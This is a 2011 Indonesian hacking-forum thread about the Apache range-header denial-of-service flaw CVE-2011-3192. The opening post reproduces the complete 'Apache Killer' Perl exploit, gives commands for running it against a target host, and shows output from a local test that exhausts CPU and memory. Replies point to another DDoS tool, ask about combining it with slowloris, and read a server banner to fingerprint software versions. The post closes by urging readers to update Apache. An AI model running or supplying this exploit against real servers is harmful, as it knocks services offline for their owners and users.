Apache DoS Vulnerability (CVE-2011-3192)

iKONspirasi · 09-02-2011, 05:12 PM

sekedar info (mungkin sudah banyak yg tahu) kalau terdapat vulnerability pada Apache HTTP Server 1.3.x dan 2.x.x hingga 2.2.19.

klo di database mitre.org nama vulnerabilitynya adalah CVE-2011-3192

vulnerability ini mengeksploitasi kelemahan Apache dalam menerima range request httpd, sehingga membuat prosesor dan memory server exhausted.

vulnerability ini telah dipatch oleh Apache.org dengan mengeluarkan versi terbaru 2.2.20 pada 31 Agustus 2011 kemarin.

berikut adalah skrip yg ada di Pastebin (sry link-nya ane lupa copy, google-fu aja), namanya Apache Killer:

Spoiler! :

Code:
#!/usr/bin/perl

    #Apache httpd Remote Denial of Service (CPU  & memory exhaustion)

    #Original by Kingcope

    #Altered by W

    #Year 2011

    #

    # Will result in swapping memory to filesystem on the remote side

    # plus killing of processes when running out of swap space.

    # Remote System becomes unstable.

    #

    use IO::Socket;

    use threads;

    sub usage

    {

            print "Apache Remote Denial of Service (CPU & memory exhaustion)\n";

            print "Originally by Kingcope\n";

            print "Altered to use threads by W\n";

            print "Usage: $0 <attack> <host> [page=/] [threads=50]\n";

            print "Example: $0 YES www.example.com index.html 50\n";

            print "If attack is anything other than 'YES', then the tool will test and exit.\n";

    }

    sub testapache

    {

            print "Testing for partial content exploit against $host$path...\n";

            my $sock = IO::Socket::INET->new(PeerAddr => $host,

                    PeerPort => "80",

                    Proto    => 'tcp') or die "Can't open socket to $host!\n";

            my $p = "HEAD $path HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-5\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";

            print $sock $p;

            my $x = <$sock>;

            if ($x =~ /Partial/)

            {

                    print "Host: $host appears to be vulnerable to partial content DoS\n";

                    return 1;

                    } else {

                    print "Host: $host appears to not be vulnerable, returned:\n$x";

                    return 0;

            }

    }

    sub exploitserver

    {

            my $sock = IO::Socket::INET->new(PeerAddr => $host,

                    PeerPort => "80",

                    Proto    => 'tcp') or return(0);

            print $sock $p;

            while(<$sock>)

            {

            }

            print ".";

    }

    if($#ARGV < 1)

    {

            &usage && exit;

    }

    $real = ($ARGV[0] eq 'YES');

    $host = $ARGV[1];

    $path = ($#ARGV > 1) ? '/' . $ARGV[2] : '/';

    $numthreads = ($#ARGV > 2) ? $ARGV[3] : 50;

    $vuln = &testapache;

    srand(time());

    my $r = "";

    for ($k=0;$k<1300;$k++)

    {

            $r .= ",5-$k";

    }

    $p = "HEAD $path HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-5$r\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";

    if($vuln && $real)

    {

            my @threads;

            $|=1;

            print "Running partial content exploit against $host$path using $numthreads threads\n";

            for(my $n = 0; $n < $numthreads; $n++)

            {

                    my $thr = async { while(1){ &exploitserver; } };

                    push(@threads, $thr);

            }

            foreach(@threads)

            {

                    $_->join();

                    print($_);

            }

    }

cara penggunaannya adalah:
1. untuk mengetahui apakah server web Apache tersebut vulnerable atau tidak

Code:
perl filename.pl www.target.com

2. untuk melakukan eksploitasi

Code:
perl filename.pl YES www.target.com

ini yg telah ane coba di localhost BT5 dengan Apache versi 2.2.14:

Quote:root@bt:~/Programs# perl apache_killer.pl YES localhost
Testing for partial content exploit against localhost/...
Host: localhost appears to be vulnerable to partial content DoS
Running partial content exploit against localhost/ using 50 threads
...........................................................................................

hasilnya:

Quote:root@bt:/pentest/web/nikto# top
top - 15:59:53 up 3:43, 6 users, load average: 16.15, 3.84, 1.55
Tasks: 188 total, 54 running, 134 sleeping, 0 stopped, 0 zombie
Cpu(s): 92.5%us, 6.8%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.7%si, 0.0%st
Mem: 3094072k total, 2748296k used, 345776k free, 59780k buffers
Swap: 1952764k total, 0k used, 1952764k free, 537448k cached

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1753 root 20 0 1067m 787m 35m R 32 26.1 56:34.54 firefox-bin
1572 root 20 0 275m 71m 32m R 12 2.4 26:46.66 kwin
1433 root 19 -1 68768 53m 10m S 11 1.8 18:27.57 Xorg
1786 root 20 0 101m 21m 15m S 4 0.7 3:10.73 konsole
4329 www-data 20 0 49808 19m 1160 S 4 0.7 0:00.66 apache2
4328 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.61 apache2
3535 www-data 20 0 49808 19m 1160 R 3 0.7 0:04.61 apache2
3975 www-data 20 0 49808 19m 1160 R 3 0.7 0:01.56 apache2
3981 www-data 20 0 49808 19m 1160 R 3 0.7 0:01.50 apache2
4012 www-data 20 0 49808 19m 1160 R 3 0.7 0:01.45 apache2
4333 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.54 apache2
4351 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.44 apache2
4364 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.43 apache2
4387 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.43 apache2
4020 www-data 20 0 49808 19m 1160 R 3 0.7 0:01.41 apache2
4377 www-data 20 0 49808 19m 1160 R 3 0.7 0:00.42 apache2
3494 www-data 20 0 49808 19m 1160 R 2 0.7 0:04.78 apache2
4026 www-data 20 0 49808 19m 1160 R 2 0.7 0:01.35 apache2
4325 www-data 20 0 49808 19m 1160 S 2 0.7 0:00.84 apache2

lihat pada Cpu(s): 92.5%us dan Mem: 3094072k total, 2748296k used, 345776k free, lihat juga pada services Apache2 dengan PID berbeda-beda dibawahnya

processor dan RAM kita dibuat bekerja secara maksimal, hal ini pastinya akan menyebabkan server akan mengalami out of service...

jadi segera update Apache server anda Smile

semoga bermanfaat
M

Sumber:

Spoiler! :

waduh postingannya kok lebar amat wkwkwk
gmn nih cara benerinnya? maaf klo keliatan kurang rapi...

**cassaprodigy** · 09-02-2011, 08:21 PM

ok udah ane bantu rapiin .. untuk copas code pake spoiler aja om .. dia gk otomatis br ..

klo soal ddos apache tools ini paten Tongue

http://forum.id-backtrack.com/showthread.php?tid=29

iKONspirasi · 09-02-2011, 09:35 PM

(09-02-2011, 08:21 PM)cassaprodigy Wrote: ok udah ane bantu rapiin .. untuk copas code pake spoiler aja om .. dia gk otomatis br ..

klo soal ddos apache tools ini paten
http://forum.id-backtrack.com/showthread.php?tid=29

wah thx alot bro, maaf merepotkan Tongue

klo slowloris digabung sama tool ini gmn hasilnya ya? Big Grin

**Junior Riau** · 10-05-2011, 06:58 AM

untuk apache tomcat berlaku gk??

iKONspirasi · 10-05-2011, 01:08 PM

ane blom pernah coba bro, dicoba aja nanti post hasilnya disini Smile

**Junior Riau** · 10-05-2011, 02:51 PM

wkwkwkw.. mau coba tapi kasian ama admin nya ntar ,,hihihi Big Grin

**NoseTrave** · 10-07-2011, 08:49 PM

Izin Belajar!
Thanks Om Konspirasi!

**betefive** · 10-23-2011, 07:25 AM

mau tanya om.. gmn cara qt tahu klo suatu situs itu apakah pk apache, php, myqsl? soalnya gw prnah nemu ini :

Spoiler! :

skalian di artikan maksud dari code di atas y om...

**cassaprodigy** · 10-23-2011, 08:13 AM

server tersebut menggunakan server apache versi 2.2.11 ( port 80 )
server berbasis unix dan menggunakan plugin ato mods di bawah ini

mod_ssl versi 2.2.11
openssl versi 0.9.8i
mod_apreg2 versi 2.6.0
mod_perl 2.0.4

suport terhadap perl dan php versi di bawah ini
php 5.2.8
perl 5.10.0

iKONspirasi · 10-24-2011, 02:24 AM

thx utk om cassa atas bantuan jawabannya Smile

klo server menggunakan webserver lain pasti akan muncul selain apache bro, misal IIS, nginx dsb